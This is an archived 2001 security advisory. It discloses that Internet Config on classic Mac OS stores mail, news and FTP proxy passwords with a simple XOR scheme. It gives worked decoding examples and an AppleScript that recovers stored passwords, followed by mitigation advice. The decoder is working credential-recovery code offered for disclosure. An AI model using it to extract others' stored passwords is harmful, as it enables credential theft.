SecureMac, Inc.

StaticUsers.net – Internet Config Advisory

June 2, 2001

Password weakness in Internet Config in MacOS
What is Internet Config?

From Internet Config FAQ: “The Internet Configuration System was designed to make your life easier by reducing the number of times which you need to enter your Internet preferences into the various preferences dialogs of all your Internet applications.

For example, currently you need to enter your Email address into many common
Macintosh Internet applications, for example Eudora, NewsWatcher and Anarchie.
The goal of the system was to get each of these applications to get this information
from one common place and to give you …

StaticUsers.net – Internet Config Advisory

Password weakness in Internet Config in MacOS

What is Internet Config?

From Internet Config FAQ: “The Internet Configuration System was designed to make your life easier by reducing the number of times which you need to enter your Internet preferences into the various preferences dialogs of all your Internet applications.

For example, currently you need to enter your Email address into many common
Macintosh Internet applications, for example Eudora, NewsWatcher and Anarchie.
The goal of the system was to get each of these applications to get this information
from one common place and to give you a tool to edit these common preferences.”

For example: When You install Power Mail 2.3.1 You can find Internet Config 2.0 in
Power Mail folder. You can use it to set Your Internet configuration and then click
on the “Use Internet Config” option when You set your e-mail account. Internet Config allows You among others to set Email Password, News Password and FTP
Proxy Password. All of these passwords are coded the same way.

Where can You find a password?

In Internet Preferences file in Preferences folder. Open this file using resource editor (ResEdit for instant) and open ICRP resource. Here You can find encrypted passwords: MailPassword, NewsAuthPassword and FTPProxyPassword. You can also find them with any hex editor, but offset depends on configuration.

Some examples

09 38 3E 3F 31 2E 29 3D 34 30 = nightrain

08 14 3B 39 3A 31 1F 33 3A = BlackDog

09 3B 38 37 37 36 32 3B 35 2A = moonlight

06 19 02 0C 15 1B 0C = OUTLAW

05 37 27 28 35 3F = apple

The first bite is the length of the password, so we don’t need it.

AA BB CC DD EE FF GG HH II JJ = aa bb cc dd ee ff gg hh ii jj

where:

AA BB CC DD EE FF GG HH II JJ – encrypted password (hex)

aa bb cc dd ee ff gg hh ii jj – decrypted password in ASCII codes (hex)

aa=AA XOR 56H

bb=BB XOR 57H

cc=CC XOR 58H

dd=DD XOR 59H

ee=EE XOR 5AH

ff=FF XOR 5BH

gg=GG XOR 5CH

hh=HH XOR 5DH

ii=II XOR 5EH

jj=JJ XOR 5FH

and so on…

An example:

38H XOR 56H = 6EH = n

3EH XOR 57H = 69H = i

3FH XOR 58H = 67H = g

31H XOR 59H = 68H = h

2EH XOR 5AH = 74H = t

29H XOR 5BH = 72H = r

3DH XOR 5CH = 61H = a

34H XOR 5DH = 69H = i

30H XOR 5EH = 6EH = n

Solution

Don’t use it or at least don’t enter any password. I wonder why Netscape support it for example.

tested on:

Internet Config v.1.3, v.1.4, v.2.0 and v.2.0.2

Netscape Messenger 4.5, PowerMail 2.3.1, E(asy)-mail 2.0,

From the Internet Config FAQ:

“The following programs supported Internet Config before 8 Nov 1995.  NewsWatcher 2.0b21 and higher, Register 1.1 and higher, NotifyMail 2.5 and higher, BlitzMail 2.0.2 and higher, MacGzip 0.2.2 and higher, FTPd 2.4.0 and higher, ICeTEe 1.1 and higher, Internet Config Access, Mpack 1.5 and higher, BBEdit 3.1.1 and higher, NewsHopper 1.1 and higher, Anarchie 1.5.0 and higher, NCSA Telnet 2.6.1d7 and higher, Black Night 0.1.4 and higher, DropURL 1.1 and higher, CyberFinder, Symantec Project Manager 8.0.3 and higher, Personal Log 2.0 and higher, most programs based on the WASTE text editing engine, Claris Emailer, Fetch 3.0b5 and higher, PowerMail, ICScriptor, Kapito, Style 1.3.2 and higher, Internet Toolkit, NetSnagger.”

Simply Apple Script to show the weakness of the password.

Usage: Don’t enter first number and don’t use spaces between.

For exapmle: 383E3F312E293D3430, but not 09383E3F312E293D3430 or 38 3E 3F 31 2E 29 3D 34 30.

(*             IC Pass 2.1 by adix        21.07.99; Apple Script English    *)

set hex1 to text returned of (display dialog “Enter encrypted password:” default answer “”

buttons {” Ok “} default button ” Ok “)

set Alicia to “01010110010101110101100001011001010110100101101101011100

010111010101111001011111”

set pass to “”

set i to 1

set skok to 0

set ile to count items in hex1

if ile = 1 or ile = 0 then

set pass to “”

else

repeat until (i > (ile – 1))

set kodascii to 0

set zn to items (i) thru (i + 1) in hex1

set lbin to hex2bin(zn) as string

repeat with a from 1 to 8

set bit2 to item (a + skok) of Alicia

set bit1 to item a of lbin

if (bit1 = bit2) then

set bitk to “0”

else

set bitk to “1”

end if

set kodascii to {kodascii + bitk * (2 ^ (8 – a))}

end repeat

set pass to {pass & (ASCII character kodascii)}

set skok to skok + 8

set i to i + 2

end repeat

end if

display dialog “Password:   ” & pass & return & return & “by adix” buttons {” Ok “} default button ” Ok ”

on hex2bin(zn)

set temphex to {“0000”, “0001”, “0010”, “0011”, “0100”, “0101”, “0110”, “0111”, “1000”, “1001”,

“1010”, “1011”, “1100”, “1101”, “1110”, “1111”}

set t2hex to “0123456789ABCDEF”

set bin to “” as string

repeat with j in zn

set t1 to j as string

repeat with i from 1 to (count items in t2hex)

if ((item i in t2hex) = t1) then

set temp to (item i in temphex)

exit repeat

end if

end repeat

set bin to {bin & temp} as string

end repeat

return (bin)

end hex2bin

Solutions

From the Internet Config FAQ:

IC does provide the ability for applications to share preferences. Any information you enter into Internet Config can be accessed by any other software you execute on your machine.

This includes preferences like the email password. You should be aware that such passwords are available to any software on your computer. IC stores passwords in a non-secure fashion.

While each password is scrambled to prevent idle viewing with ResEdit, the scrambling algorithm is publicly documented in the IC Programming Kit. Anyone with a trivial programming background can access these passwords.

Note: This situation is no different from the passwords you enter into other applications. When you ask a program (such Users & Groups) to store a password, it must be stored in some file somewhere on your hard disk.  The only difference is that IC provides a public API for getting at these passwords. The important thing to keep in mind is that you should not install software that you do not trust on your machine.

Note: If you ignore this advice (and install software you do not trust on to your computer), password secrecy is the least of your problems. Specifically, the Mac OS does not prevent a program from erasing the entire contents of your hard disk.
If you want to know which applications are accessing which IC preferences, you can install:

ICAccess Logger (ftp://ftp.stairways.com/stairways/hacks/).

Filed under Mac Classic, Security Advisory

Related Posts

Latest Security News

Get the latest security news and deals